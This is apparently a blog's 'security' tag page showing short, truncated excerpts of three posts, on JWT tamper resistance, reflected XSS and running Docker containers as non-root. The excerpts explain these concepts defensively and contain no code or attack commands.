Tag: security

Why can’t you tamper with a JWT?

JWT tokens are a very popular way of transmitting claims information between systems. It’s based on a public key system so that the claims can be verified and the verifier can be confident that the claim was issued by a trusted entity. Microservice architectures will commonly use the claims to perform access control. For example, […]

Reflected XSS

Reflected XSS attacks are a common way of tricking a users browser agent into executing malicious code. I’ll share onedefinition I found from mozilla and unpack the key terms / concepts. When a user is tricked into clicking a malicious link, submitting a specially crafted form, or browsing to a malicious site, the injected code […]

Running docker container as non-root

One common misconception is that containers provide a secure and isolated environment and therefore it’s fine for processes to run as root (this is the default). I mean, it’s not like it can affect the host system right? Turns out it can and it’s called “container breakout”! With containers, you should also apply the principle […]